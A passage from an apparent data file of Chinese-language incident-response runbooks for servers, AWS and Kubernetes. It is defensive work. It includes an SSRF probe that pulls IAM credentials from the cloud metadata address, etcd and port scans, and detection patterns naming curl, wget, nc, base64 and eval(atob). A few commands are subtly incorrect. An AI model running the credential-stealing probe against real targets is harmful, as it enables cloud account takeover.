      { title: "清除 + 断网 + 备份取证", cmd: "sudo iptables -A OUTPUT -d <矿池IP> -j DROP\nsudo kill -9 <pid>\nsudo rm -f /path/to/miner\nsudo tar czf /root/incident-$(date +%F).tgz /var/log /etc/systemd /root/.ssh /home/*/.ssh" },
    ],
  },
  {
    slug: "ransomware-triage",
    category: "attack",
    severity: "danger",
    title: "疑似勒索软件 · 一小时黄金响应",
    summary: "先断网 · 再取证 · 最后再谈恢复。任何情况下不要付款",
    tags: ["勒索", "应急"],
    steps: [
      { title: "第 1 分钟：物理/逻辑断网", desc: "拔线或防火墙 DROP，防止横向扩散和二次加密", cmd: "sudo iptables -P INPUT DROP\nsudo iptables -P OUTPUT DROP\nsudo iptables -P FORWARD DROP\nsudo iptables -I INPUT -s <管理机IP> -j ACCEPT   # 保留应急通道" },
      { title: "看加密器进程和文件写入", cmd: "sudo lsof | rg -i 'encrypted\\|\\.locked\\|\\.crypt\\|README\\|HOW_TO' | head\nsudo iotop -bn 2 -o | head -20      # 看谁在疯狂写盘" },
      { title: "识别勒索家族（找勒索信）", cmd: "find / -maxdepth 5 -type f \\( -iname 'ransom*' -o -iname 'readme*' -o -iname 'how_to*' -o -iname '*decrypt*' \\) 2>/dev/null | head" },
      { title: "上传样本到勒索识别站", cmd: "# https://id-ransomware.malwarehunterteam.com/\n# 或 https://www.nomoreransom.org/  可能有免费解密工具" },
      { title: "保留证据 + 快照", cmd: "sudo dd if=/dev/sda of=/mnt/backup/disk.img bs=1M status=progress   # 全盘镜像\nsudo tar czf /mnt/backup/logs.tgz /var/log /root/.bash_history /home/*/.bash_history" },
      { title: "评估备份并恢复", cmd: "# 确认备份未被加密\n# 隔离后从冷备份恢复\n# 恢复后必须改所有 SSH/DB 密码 + rotate 证书" },
    ],
  },
  {
    slug: "data-exfiltration",
    category: "attack",
    severity: "danger",
    title: "疑似数据外泄 · 出网异常定位",
    summary: "抓大流量 / 长连接 / 陌生外发目的地",
    tags: ["数据泄露", "取证"],
    steps: [
      { title: "看出网带宽异常", cmd: "iftop -nNP -t -s 60 2>/dev/null\n# 或\nvnstat -tr 30" },
      { title: "TOP 出网连接（谁在往外传）", cmd: "sudo iftop -nNP -o 2s\n# 或\nsudo nethogs -t -c 5" },
      { title: "看不在白名单的连接", cmd: "sudo lsof -i -n -P | rg -v ':(22|53|80|443|3306|6379) '" },
      { title: "抓 5 分钟包看外发目的", cmd: "sudo timeout 300 tcpdump -ni any 'not (port 22 or port 80 or port 443)' -w /tmp/exfil.pcap\ntshark -r /tmp/exfil.pcap -q -z conv,ip | head -30", tool: "tshark" },
      { title: "查目标 IP 归属", cmd: "for ip in <可疑IP列表>; do echo -n \"$ip -> \"; curl -s ipinfo.io/$ip | jq -r '.country, .org' | paste -sd' '; done" },
      { title: "DB 侧确认是否有大结果集查询", cmd: "# MySQL\nsudo tail -1000 /var/log/mysql/mysql-slow.log | rg -i 'SELECT.*LIMIT [0-9]{4,}'\n# Redis\nredis-cli --stat" },
    ],
  },
  {
    slug: "supply-chain-package",
    category: "attack",
    severity: "warn",
    title: "供应链投毒 · 依赖包异常排查",
    summary: "npm / pip / go mod 里冒出的可疑最新版本",
    tags: ["供应链", "依赖"],
    steps: [
      { title: "看近期新装/升级过的包", cmd: "# npm\nnpm ls --all --depth=0\ncat package-lock.json | jq '.packages | to_entries[] | {name:.key, version:.value.version, integrity:.value.integrity}' | head -30\n# pip\npip list --format=freeze" },
      { title: "扫已知漏洞和恶意包", cmd: "npm audit --audit-level=high\npip install pip-audit && pip-audit\ntrivy fs .", tool: "trivy" },
      { title: "静态扫源码找可疑动作", cmd: "rg -n --no-ignore -E 'child_process|require\\([\"'\\'']http[s]?[\"'\\'']\\)|net\\.createConnection|eval\\(atob' node_modules 2>/dev/null | head -30" },
      { title: "锁版本 + 私有 registry", cmd: "npm ci                                        # 严格按 lock 装\nnpm config set registry https://registry.npmmirror.com\n# 用 verdaccio / Nexus 自建私仓，白名单同步" },
    ],
  },

  // ==================== 系统与应用 ====================
  {
    slug: "server-cpu-100",
    category: "system",
    title: "服务器 CPU 100% · 排查是谁在跑",
    summary: "定位到进程 → 线程 → 系统调用",
    tags: ["cpu", "性能"],
    steps: [
      { title: "看 TOP 进程", cmd: "top -bn1 -o %CPU | head -15\nps -eo pid,%cpu,%mem,user,cmd --sort=-%cpu | head" },
      { title: "看该进程的线程", cmd: "top -Hp <pid>\nps -T -p <pid>" },
      { title: "抓一段 syscall 看它在干嘛", cmd: "sudo strace -c -p <pid> &\nsleep 10; kill %1" },
      { title: "Java 应用 → 线程栈", cmd: "jstack <pid> > /tmp/stack.log\n# 查最烫的线程\nprintf '%x\\n' <thread-id>       # 转 16 进制在 stack.log 里搜" },
      { title: "看是不是 iowait / softirq 高", cmd: "vmstat 1 5\nmpstat -P ALL 1 5" },
    ],
  },
  {
    slug: "disk-full",
    category: "system",
    title: "磁盘打满 · 定位大文件与幽灵占用",
    summary: "df 正常但空间不够 → 多半是 deleted 但未释放",
    tags: ["磁盘"],
    steps: [
      { title: "各分区使用", cmd: "df -h\ndf -i           # inode 也可能爆" },
      { title: "找大目录", cmd: "sudo du -h -d 1 /var 2>/dev/null | sort -hr | head\nsudo ncdu /var  # 交互式" },
      { title: "找大文件", cmd: "sudo find / -xdev -type f -size +500M -exec ls -lh {} \\; 2>/dev/null | sort -k5 -h | tail" },
      { title: "已删除但被进程占着", desc: "df 显示满 · du 却对不上 → 就是这类", cmd: "sudo lsof +L1 | head\n# 找到后重启对应进程即可释放" },
      { title: "docker 常见 offender", cmd: "docker system df\ndocker system prune -af --volumes    # 谨慎" },
    ],
  },
  {
    slug: "service-cant-start",
    category: "system",
    title: "服务起不来 · systemd unit failed",
    summary: "看日志 → 端口占用 → 权限 → 依赖",
    tags: ["systemd", "服务"],
    steps: [
      { title: "看 unit 状态和最近日志", cmd: "systemctl status my-svc -l --no-pager\njournalctl -u my-svc -n 200 --no-pager", tool: "journalctl" },
      { title: "端口是否被占", cmd: "sudo lsof -iTCP:<port> -sTCP:LISTEN -n -P" },
      { title: "配置语法先自检", cmd: "nginx -t\nsshd -t\n# 应用自身: my-svc --check-config" },
      { title: "手工前台跑一遍看真实报错", cmd: "sudo -u my-svc-user /usr/bin/my-svc --foreground --debug" },
      { title: "看依赖服务是否就绪", cmd: "systemctl list-dependencies my-svc" },
    ],
  },
  {
    slug: "oom-killed",
    category: "system",
    title: "进程被 OOM killer 干掉",
    summary: "确认是不是 OOM · 定位最耗内存的家伙",
    tags: ["内存", "oom"],
    steps: [
      { title: "找 OOM 记录", cmd: "sudo dmesg -T | rg -i 'killed process\\|out of memory'\nsudo journalctl -k | rg -i oom" },
      { title: "看当前内存 TOP 进程", cmd: "ps -eo pid,%mem,rss,cmd --sort=-%mem | head -15" },
      { title: "cgroup 层是否也在限", cmd: "systemd-cgtop -1 -n 1\n# k8s pod\nkubectl top pod <pod>\nkubectl describe pod <pod> | rg -i oom" },
      { title: "临时应急", cmd: "# 调整 oom_score_adj 保护关键进程\nsudo echo -1000 > /proc/<pid>/oom_score_adj\n# 加 swap 应急\nsudo fallocate -l 2G /swapfile && sudo mkswap /swapfile && sudo swapon /swapfile" },
    ],
  },
  {
    slug: "502-504-triage",
    category: "system",
    title: "nginx 502 / 504 排查 · 反代场景一条龙",
    summary: "502=上游拒绝或崩了 / 504=上游太慢 · 4 步定性 + 分场景处方",
    tags: ["nginx", "502", "504", "反代", "gateway"],
    severity: "warn",
    steps: [
      { title: "先分清是 502 还是 504", desc: "502=connect/read 拒绝或崩溃  504=read timeout 超时", cmd: "curl -sI http://YOUR_HOST:PORT/ | head -1\n# 502 → 走 A 路径\n# 504 → 走 B 路径", tool: "curl" },
      { title: "1) nginx 错误日志定性（关键字）", desc: "connect refused=上游没起 / prematurely closed=崩了 / timed out=网络不通 / no live upstreams=全挂", cmd: "tail -50 /var/log/nginx/error.log\n# 常见关键字:\n#   (111: Connection refused)\n#   upstream prematurely closed connection\n#   (110: Connection timed out)\n#   no live upstreams\n#   host not found in upstream" },
      { title: "2) 上游进程活没活", cmd: "systemctl status my-svc\nss -ltnp | grep :<internal-port>\n# 没监听 → 服务挂了，跳到 A1" },
      { title: "3) 从 nginx 机直连上游", desc: "本机 curl 上游端口，200=nginx 配错  非200=上游本身问题", cmd: "curl -v --max-time 5 http://127.0.0.1:<internal-port>/", tool: "curl" },
      { title: "4) 上游自己的日志", cmd: "journalctl -u my-svc -n 200 --no-pager | grep -iE 'error|fatal|oom|econnrefused'\ndmesg 2>/dev/null | grep -i 'killed process' | tail -3", tool: "journalctl" },
      { title: "A1 · 上游进程死了/没起", desc: "ss 看不到监听端口  systemctl 状态 failed/inactive", cmd: "systemctl restart my-svc\njournalctl -u my-svc -n 200 --no-pager\n# 常见根因: OOM / 端口占用 / node 版本不匹配 / 工作目录不对" },
      { title: "A2 · 上游能起但秒崩（restart 循环）", cmd: "systemctl status my-svc | grep -E 'Active|Main PID|status'\n# 手动前台跑一次抓栈\ncd /opt/my-app && NODE_ENV=production PORT=3000 node server.js" },
      { title: "A3 · nginx 到上游 Connection refused（本机）", desc: "curl 127.0.0.1:port 正常 但走域名 502 → nginx upstream 写错", cmd: "nginx -T | grep -A3 proxy_pass\nnginx -t && systemctl reload nginx" },
      { title: "A4 · 跨机 connect timed out", desc: "上游 HOSTNAME 只绑 127.0.0.1 / 安全组 / selinux", cmd: "# 上游侧确认监听地址\nss -ltn | grep :<port>\n# selinux 场景\nsudo setsebool -P httpd_can_network_connect 1\n# 云主机安全组 / ufw / iptables 放行" },
      { title: "A5 · upstream prematurely closed（大文件 / WebSocket）", cmd: "# nginx.conf http 或 server 段\nclient_max_body_size 50m;\nproxy_buffer_size    16k;\nproxy_buffers        8 16k;\nproxy_busy_buffers_size 32k;\n# WebSocket / SSE\nproxy_http_version 1.1;\nproxy_set_header Upgrade $http_upgrade;\nproxy_set_header Connection \"upgrade\";" },
      { title: "B1 · 504 上游真的慢（业务问题）", cmd: "# 直接压 curl 看真实耗时\ncurl -s -o /dev/null -w 'time=%{time_total}s\\n' http://127.0.0.1:3000/slow\n# 临时放大 nginx 超时\nproxy_connect_timeout 10s;\nproxy_send_timeout    60s;\nproxy_read_timeout    300s;" },
      { title: "B2 · 长连接 / 流式接口准点 60s 断", desc: "SSE、长轮询、大文件下载被默认 60s 截断 → 该 location 单独放宽 + 关缓冲", cmd: "location /api/stream {\n  proxy_pass http://127.0.0.1:3000;\n  proxy_read_timeout 3600s;\n  proxy_buffering off;\n}" },
      { title: "B3 · upstream 用域名 host not found", cmd: "# 加 resolver 或直接用 IP\nresolver 8.8.8.8 223.5.5.5 valid=30s;\nupstream app { server 10.0.0.5:3000; }" },
      { title: "B4 · 跨云跨地域丢包 / MTU", cmd: "mtr -rwzbc 50 <upstream-ip>\n# 隧道/PPPoE 场景改 MTU\nsudo ip link set eth0 mtu 1400", tool: "mtr" },
      { title: "一键自检脚本", desc: "复制即用 · 6 步定性打印", cmd: "cat >/tmp/triage.sh <<'EOF'\n#!/usr/bin/env bash\nSVC=\"${1:-my-svc}\"; PORT=\"${2:-3000}\"\necho \"== service ==\"; systemctl is-active \"$SVC\"; systemctl show \"$SVC\" -p NRestarts --value\necho \"== listen  ==\"; ss -ltnp | grep \":$PORT \" || echo \"NOT LISTENING\"\necho \"== local   ==\"; curl -s -o /dev/null -w \"code=%{http_code} time=%{time_total}s\\n\" --max-time 5 \"http://127.0.0.1:$PORT/\"\necho \"== nginx err ==\"; tail -20 /var/log/nginx/error.log\necho \"== svc log ==\"; journalctl -u \"$SVC\" -n 200 --no-pager | grep -iE 'error|fatal|oom|econnrefused' | tail -10\necho \"== dmesg oom ==\"; dmesg 2>/dev/null | grep -i 'killed process' | tail -3\nEOF\nbash /tmp/triage.sh my-svc 3000" },
    ],
    relatedTools: ["curl", "netcat", "tcpdump", "mtr"],
  },

  // ─────────────────── 云安全事件 ───────────────────
  {
    slug: "aws-ak-leaked",
    category: "cloud",
    title: "AWS AccessKey 泄漏应急",
    summary: "GitHub 扫到 AKIA / 账单突增 · 30 分钟锁定影响面",
    tags: ["aws", "ak", "iam", "应急"],
    severity: "danger",
    steps: [
      { title: "立刻禁用 key（不是删，先禁）", cmd: "aws iam update-access-key --access-key-id AKIA... --status Inactive --user-name <user>\n# 隔离用户\naws iam attach-user-policy --user-name <user> --policy-arn arn:aws:iam::aws:policy/AWSDenyAll" },
      { title: "查 key 最近调用了什么", cmd: "aws cloudtrail lookup-events --lookup-attributes AttributeKey=AccessKeyId,AttributeValue=AKIA... --max-results 200\naws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=<user> --start-time 2026-07-15" },
      { title: "看资源变更（新建 EC2 / IAM / S3）", cmd: "# CloudTrail 里过 RunInstances / CreateUser / PutBucketPolicy\naws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=RunInstances\naws ec2 describe-instances --query 'Reservations[].Instances[?LaunchTime>=`2026-07-15`].[InstanceId,LaunchTime,Placement.AvailabilityZone]'" },
      { title: "全区扫异常算力（挖矿）", cmd: "for r in us-east-1 us-west-2 ap-northeast-1 eu-west-1; do\n  echo \"== $r ==\"\n  aws ec2 describe-instances --region $r --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[InstanceId,InstanceType,LaunchTime]' --output table\ndone" },
      { title: "查 GitHub 泄漏源", cmd: "# 本地全仓库扫\nrg -n 'AKIA[0-9A-Z]{16}' ~/code\n# gitleaks 扫历史\ngitleaks detect --source . --log-opts='--all'", tool: "gitleaks" },
      { title: "轮换 + 复盘", cmd: "aws iam create-access-key --user-name <user>\naws iam delete-access-key --access-key-id AKIA... --user-name <user>\n# 强制加 MFA + 缩权\naws iam put-user-policy --user-name <user> --policy-name deny-no-mfa --policy-document file://deny-no-mfa.json" },
    ],
    relatedTools: ["gitleaks", "trufflehog"],
  },
  {
    slug: "security-group-open",
    category: "cloud",
    title: "安全组 0.0.0.0/0 误开高危端口",
    summary: "扫全账号 SG · 收敛 22/3306/6379/9200 等",
    tags: ["aws", "aliyun", "sg", "端口"],
    severity: "warn",
    steps: [
      { title: "AWS 全区列 0.0.0.0/0 规则", cmd: "for r in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do\n  aws ec2 describe-security-groups --region $r \\\n    --query 'SecurityGroups[?IpPermissions[?IpRanges[?CidrIp==`0.0.0.0/0`]]].[GroupId,GroupName,VpcId]' \\\n    --output table\ndone" },
      { title: "只看高危端口暴露", cmd: "aws ec2 describe-security-groups --query 'SecurityGroups[].IpPermissions[?FromPort==`22`||FromPort==`3389`||FromPort==`3306`||FromPort==`6379`||FromPort==`9200`||FromPort==`27017`][]'" },
      { title: "阿里云 SG 全查", cmd: "aliyun ecs DescribeSecurityGroups --RegionId cn-hangzhou\naliyun ecs DescribeSecurityGroupAttribute --SecurityGroupId sg-xxx --Direction ingress" },
      { title: "外网侧复核（真的通吗）", cmd: "# 从外网机器扫\nnmap -Pn -p 22,3306,6379,9200 <公网IP>\n# 或 masscan\nmasscan -p22,3306,6379 <公网IP>/32 --rate 1000", tool: "nmap" },
      { title: "收敛（AWS 撤销 0.0.0.0/0 SSH）", cmd: "aws ec2 revoke-security-group-ingress --group-id sg-xxx \\\n  --protocol tcp --port 22 --cidr 0.0.0.0/0\n# 换成办公 IP\naws ec2 authorize-security-group-ingress --group-id sg-xxx \\\n  --protocol tcp --port 22 --cidr 203.0.113.5/32" },
    ],
    relatedTools: ["nmap", "prowler"],
  },
  {
    slug: "s3-bucket-public",
    category: "cloud",
    title: "S3 / OSS 桶匿名可读写",
    summary: "全桶扫 ACL + Policy · 关闭匿名 · 复盘泄漏面",
    tags: ["s3", "oss", "泄漏"],
    severity: "danger",
    steps: [
      { title: "AWS 全桶扫可公开", cmd: "aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\\t' '\\n' | while read b; do\n  echo \"== $b ==\"\n  aws s3api get-bucket-acl --bucket $b --query 'Grants[?Grantee.URI==`http://acs.amazonaws.com/groups/global/AllUsers`]' 2>/dev/null\n  aws s3api get-bucket-policy-status --bucket $b 2>/dev/null\ndone" },
      { title: "阿里云 OSS", cmd: "ossutil ls oss://\nfor b in $(ossutil ls oss:// | rg 'oss://' | awk '{print $NF}'); do\n  echo \"== $b ==\"\n  ossutil stat $b | rg -i 'acl\\|policy'\ndone" },
      { title: "外网复核（匿名能不能拉）", cmd: "# 无凭据直接列\ncurl -sI https://<bucket>.s3.amazonaws.com/\ncurl -s  https://<bucket>.s3.amazonaws.com/?list-type=2 | head -30\n# OSS\ncurl -s https://<bucket>.oss-cn-hangzhou.aliyuncs.com/?list-type=2" },
      { title: "关匿名 + 打 Block Public Access", cmd: "aws s3api put-public-access-block --bucket <b> \\\n  --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true\n# OSS\nossutil set-acl oss://<bucket> private -b" },
      { title: "复盘：谁下载过", cmd: "# 打开 access log 后回查\naws s3api get-bucket-logging --bucket <b>\n# 已有日志：过匿名请求（Requester=anon）\nrg -n 'Requester=- ' access-log-*.log | awk '{print $1,$5,$8,$11}'" },
    ],
    relatedTools: ["prowler", "trivy"],
  },
  {
    slug: "iam-privilege-escalation",
    category: "cloud",
    title: "IAM 越权 / 提权路径",
    summary: "PassRole · AttachPolicy · sts:AssumeRole 链",
    tags: ["iam", "越权", "aws"],
    severity: "warn",
    steps: [
      { title: "跑 pmapper 出提权路径", cmd: "pip install principalmapper\npmapper graph create\npmapper query 'preset privesc *'\npmapper visualize --filetype png" },
      { title: "手工过高危权限", cmd: "aws iam list-users --query 'Users[].UserName' --output text | tr '\\t' '\\n' | while read u; do\n  aws iam list-attached-user-policies --user-name $u --query 'AttachedPolicies[?PolicyArn==`arn:aws:iam::aws:policy/AdministratorAccess`]'\ndone" },
      { title: "查危险 inline policy", cmd: "aws iam list-users --query 'Users[].UserName' --output text | tr '\\t' '\\n' | while read u; do\n  for p in $(aws iam list-user-policies --user-name $u --query 'PolicyNames[]' --output text); do\n    aws iam get-user-policy --user-name $u --policy-name $p | rg -i 'iam:PassRole\\|iam:AttachUser\\|\"\\*\"'\n  done\ndone" },
      { title: "跨账号信任关系审计", cmd: "aws iam list-roles --query 'Roles[?AssumeRolePolicyDocument.Statement[?Principal.AWS!=null]].[RoleName,AssumeRolePolicyDocument]' --output json | jq '.'" },
      { title: "Prowler 全量合规扫", cmd: "prowler aws --checks iam_*\nprowler aws --severity critical high", tool: "prowler" },
    ],
    relatedTools: ["prowler"],
  },
  {
    slug: "cloud-bill-anomaly",
    category: "cloud",
    title: "云账单突增（挖矿 / 流量盗刷）",
    summary: "按服务 / 区域 / 资源三层拆账单 · 锁定异常",
    tags: ["账单", "挖矿", "cost"],
    severity: "danger",
    steps: [
      { title: "按服务拆最近 7 天账单", cmd: "aws ce get-cost-and-usage \\\n  --time-period Start=2026-07-09,End=2026-07-16 \\\n  --granularity DAILY --metrics UnblendedCost \\\n  --group-by Type=DIMENSION,Key=SERVICE" },
      { title: "按区域拆（找异常区）", cmd: "aws ce get-cost-and-usage --time-period Start=2026-07-09,End=2026-07-16 \\\n  --granularity DAILY --metrics UnblendedCost \\\n  --group-by Type=DIMENSION,Key=REGION" },
      { title: "定位到具体实例 / 资源", cmd: "aws ce get-cost-and-usage-with-resources \\\n  --time-period Start=2026-07-14,End=2026-07-16 \\\n  --granularity DAILY --metrics UnblendedCost \\\n  --filter file://filter.json \\\n  --group-by Type=DIMENSION,Key=RESOURCE_ID" },
      { title: "异常区列所有 running 实例", cmd: "aws ec2 describe-instances --region <bad-region> \\\n  --filters Name=instance-state-name,Values=running \\\n  --query 'Reservations[].Instances[].[InstanceId,InstanceType,LaunchTime,Tags]' --output table" },
      { title: "止血：批量关停 + 快照", cmd: "aws ec2 create-snapshot --volume-id vol-xxx --description forensic\naws ec2 stop-instances --region <r> --instance-ids i-xxx i-yyy" },
    ],
    relatedTools: [],
  },
  {
    slug: "metadata-ssrf-imds",
    category: "cloud",
    title: "元数据服务 SSRF（IMDS 泄漏 STS）",
    summary: "169.254.169.254 被薅 · 强制 IMDSv2 · 换角色",
    tags: ["ssrf", "imds", "sts"],
    severity: "danger",
    steps: [
      { title: "确认应用有 SSRF 触点", cmd: "curl -s 'https://target/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'\n# 拿到 role name 后再拉凭据\ncurl -s 'https://target/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>'" },
      { title: "查该 role 最近调用记录", cmd: "aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=<role> --max-results 200" },
      { title: "强制 IMDSv2（禁 v1）", cmd: "aws ec2 modify-instance-metadata-options --instance-id i-xxx \\\n  --http-tokens required --http-endpoint enabled --http-put-response-hop-limit 1" },
      { title: "全区批量收敛 IMDSv1", cmd: "for r in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do\n  for i in $(aws ec2 describe-instances --region $r --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId' --output text); do\n    aws ec2 modify-instance-metadata-options --region $r --instance-id $i --http-tokens required\n  done\ndone" },
      { title: "轮换 role + 上层挡", cmd: "# 撤 role 附加的高危策略\naws iam detach-role-policy --role-name <r> --policy-arn <p>\n# WAF / Nginx 层挡内网\nlocation /api/ { if ($arg_url ~* \"169\\\\.254\\\\.169\\\\.254|metadata\\\\.google|100\\\\.100\\\\.100\\\\.200\") { return 403; } }" },
    ],
    relatedTools: [],
  },

  // ─────────────────── K8s 集群事件 ───────────────────
  {
    slug: "k8s-pod-escape",
    category: "k8s",
    title: "Pod 逃逸迹象（特权容器 / hostPath / hostPID）",
    summary: "扫全集群危险 Pod · 阻断并取证",
    tags: ["k8s", "逃逸", "privileged"],
    severity: "danger",
    steps: [
      { title: "扫全集群特权 Pod", cmd: "kubectl get pod -A -o json | jq -r '.items[] | select(.spec.containers[].securityContext.privileged==true) | \"\\(.metadata.namespace)/\\(.metadata.name)\"'" },
      { title: "扫 hostPath / hostPID / hostNetwork", cmd: "kubectl get pod -A -o json | jq -r '.items[] | select(.spec.hostPID==true or .spec.hostNetwork==true or (.spec.volumes[]?.hostPath)) | \"\\(.metadata.namespace)/\\(.metadata.name) host=\\(.spec.hostPID)/\\(.spec.hostNetwork) vols=\\([.spec.volumes[]?.hostPath.path] | join(\",\"))\"'" },
      { title: "进容器看当前行为", cmd: "kubectl exec -n <ns> <pod> -- ps -ef\nkubectl exec -n <ns> <pod> -- ls -la /host 2>/dev/null\nkubectl exec -n <ns> <pod> -- cat /proc/1/cgroup\nkubectl logs -n <ns> <pod> --tail 200" },
      { title: "取证 + 隔离（不要删）", cmd: "# 快照文件\nkubectl cp <ns>/<pod>:/tmp ./forensic-$(date +%s)/\n# 打 taint 让它不能调度到别处\nkubectl cordon <node>\n# NetworkPolicy 断网\nkubectl apply -f - <<'YAML'\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata: { name: iso, namespace: <ns> }\nspec: { podSelector: { matchLabels: { app: <bad> } }, policyTypes: [Ingress, Egress] }\nYAML" },
      { title: "根因：谁部署的", cmd: "kubectl get pod <p> -n <ns> -o yaml | rg 'kubernetes.io/created-by\\|managedFields'\nkubectl get events -n <ns> --sort-by=.lastTimestamp | tail -30" },
      { title: "长效防御：PSA / OPA", cmd: "kubectl label ns <ns> pod-security.kubernetes.io/enforce=restricted\n# OPA gatekeeper 拒特权\nkubectl apply -f https://raw.githubusercontent.com/open-policy-agent/gatekeeper-library/master/library/pod-security-policy/privileged-containers/template.yaml" },
    ],
    relatedTools: ["kubectl", "trivy"],
  },
  {
    slug: "k8s-rbac-abuse",
    category: "k8s",
    title: "RBAC 越权 / ServiceAccount 提权",
    summary: "找 cluster-admin 滥用 + 危险动词组合",
    tags: ["k8s", "rbac", "越权"],
    severity: "warn",
    steps: [
      { title: "谁绑了 cluster-admin", cmd: "kubectl get clusterrolebinding -o json | jq -r '.items[] | select(.roleRef.name==\"cluster-admin\") | \"\\(.metadata.name) -> \\(.subjects)\"'" },
      { title: "找危险动词组合（* on *）", cmd: "kubectl get clusterrole -o json | jq -r '.items[] | select(.rules[]? | (.verbs[]?==\"*\") and (.resources[]?==\"*\")) | .metadata.name'" },
      { title: "扫可以偷 secret 的 SA", cmd: "kubectl auth can-i list secrets --all-namespaces --as=system:serviceaccount:default:default\n# 批量扫\nfor sa in $(kubectl get sa -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}{\"\\n\"}{end}'); do\n  ns=\"${sa%/*}\"; name=\"${sa#*/}\"\n  can=$(kubectl auth can-i list secrets -n $ns --as=system:serviceaccount:$ns:$name 2>/dev/null)\n  [ \"$can\" = \"yes\" ] && echo \"[!] $sa\"\ndone" },
      { title: "kubectl-who-can 一把梭", cmd: "kubectl krew install who-can\nkubectl who-can create pods --all-namespaces\nkubectl who-can '*' '*' --all-namespaces" },
      { title: "rakkess 权限矩阵", cmd: "kubectl krew install access-matrix\nkubectl access-matrix --sa default:default -n default" },
      { title: "收敛：换 restricted role + 审计日志", cmd: "kubectl create role app-min --verb=get,list --resource=configmap,pod -n <ns>\nkubectl create rolebinding app-min --role=app-min --serviceaccount=<ns>:<sa> -n <ns>\n# 打开 audit\n# --audit-policy-file=/etc/k8s/audit.yaml --audit-log-path=/var/log/k8s-audit.log" },
    ],
    relatedTools: ["kubectl"],
  },
  {
    slug: "k8s-etcd-exposure",
    category: "k8s",
    title: "Etcd 未鉴权 / 2379 暴露",
    summary: "扫端口 · 校验 mTLS · 拉全集群 secret 风险",
    tags: ["k8s", "etcd", "泄漏"],
    severity: "danger",
    steps: [
      { title: "外网侧扫 2379", cmd: "nmap -Pn -p 2379,2380 <master-ip>\n# 尝试无证书直连\ncurl -sk https://<master-ip>:2379/version" },
      { title: "master 上校验 etcd 参数", cmd: "ps aux | rg etcd | tr ' ' '\\n' | rg -- '--(client-cert-auth\\|listen-client-urls\\|cert-file\\|trusted-ca-file)'\n# 应该都开 --client-cert-auth=true 且不监听 0.0.0.0" },
      { title: "已开鉴权？测证书路径", cmd: "sudo ETCDCTL_API=3 etcdctl \\\n  --cacert=/etc/kubernetes/pki/etcd/ca.crt \\\n  --cert=/etc/kubernetes/pki/etcd/server.crt \\\n  --key=/etc/kubernetes/pki/etcd/server.key \\\n  --endpoints=https://127.0.0.1:2379 endpoint health" },
      { title: "有 secret 落地？评估影响面", cmd: "sudo ETCDCTL_API=3 etcdctl ... get / --prefix --keys-only | rg '/secrets/' | wc -l\n# 强烈建议开 encryption-at-rest\ncat /etc/kubernetes/manifests/kube-apiserver.yaml | rg encryption-provider" },
      { title: "收敛：绑内网 + iptables", cmd: "# 只监听 127.0.0.1 + 内网 IP\n--listen-client-urls=https://127.0.0.1:2379,https://10.0.0.10:2379\niptables -I INPUT -p tcp --dport 2379 ! -s 10.0.0.0/24 -j DROP" },
    ],
    relatedTools: ["nmap"],
  },
  {
    slug: "k8s-image-supplychain",
    category: "k8s",
    title: "镜像投毒 / 供应链污染",
    summary: "扫全集群 CVE + 未签名镜像 · 拦准入",
    tags: ["k8s", "镜像", "供应链"],
    severity: "warn",
    steps: [
      { title: "列全集群在跑镜像", cmd: "kubectl get pod -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}{\"\\t\"}{range .spec.containers[*]}{.image}{\",\"}{end}{\"\\n\"}{end}' | sort -u" },
      { title: "Trivy 扫全部 in-use 镜像", cmd: "for img in $(kubectl get pod -A -o jsonpath='{range .items[*].spec.containers[*]}{.image}{\"\\n\"}{end}' | sort -u); do\n  echo \"== $img ==\"\n  trivy image --severity HIGH,CRITICAL --quiet $img\ndone", tool: "trivy" },
      { title: "查用了 :latest 或未固定 digest", cmd: "kubectl get pod -A -o jsonpath='{range .items[*].spec.containers[*]}{.image}{\"\\n\"}{end}' | rg -v '@sha256:' | rg ':latest\\|:main\\|:dev' | sort -u" },
      { title: "拦准入：cosign / kyverno", cmd: "# 只允许签名镜像\nkubectl apply -f - <<'YAML'\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata: { name: require-signed }\nspec:\n  validationFailureAction: enforce\n  rules:\n    - name: check-signature\n      match: { resources: { kinds: [Pod] } }\n      verifyImages:\n        - imageReferences: [\"registry.mycorp.com/*\"]\n          attestors: [{ entries: [{ keys: { publicKeys: \"...\" } }] }]\nYAML" },
      { title: "构建侧修：加 SBOM + 扫", cmd: "syft <img> -o spdx-json > sbom.json\ngrype <img> --fail-on high\ncosign sign --key cosign.key <img>" },
    ],
    relatedTools: ["trivy"],
  },
  {
    slug: "k8s-cronjob-backdoor",
    category: "k8s",
    title: "隐藏 CronJob / 计划任务后门",
    summary: "全 ns 扫可疑 CronJob · 命名混淆 / curl 反连",
    tags: ["k8s", "cronjob", "后门"],
    severity: "danger",
    steps: [
      { title: "列全集群 CronJob", cmd: "kubectl get cronjob -A -o wide" },
      { title: "过含 curl / wget / base64 / nc 的命令", cmd: "kubectl get cronjob -A -o json | jq -r '.items[] | \"\\(.metadata.namespace)/\\(.metadata.name)\\t\\(.spec.jobTemplate.spec.template.spec.containers[].command)\\t\\(.spec.jobTemplate.spec.template.spec.containers[].args)\"' | rg -i 'curl\\|wget\\|base64\\|/bin/bash\\|nc '" },
      { title: "看历史 Job 输出", cmd: "kubectl get job -A --sort-by=.metadata.creationTimestamp | tail -30\nkubectl logs -n <ns> job/<job> --tail 500" },
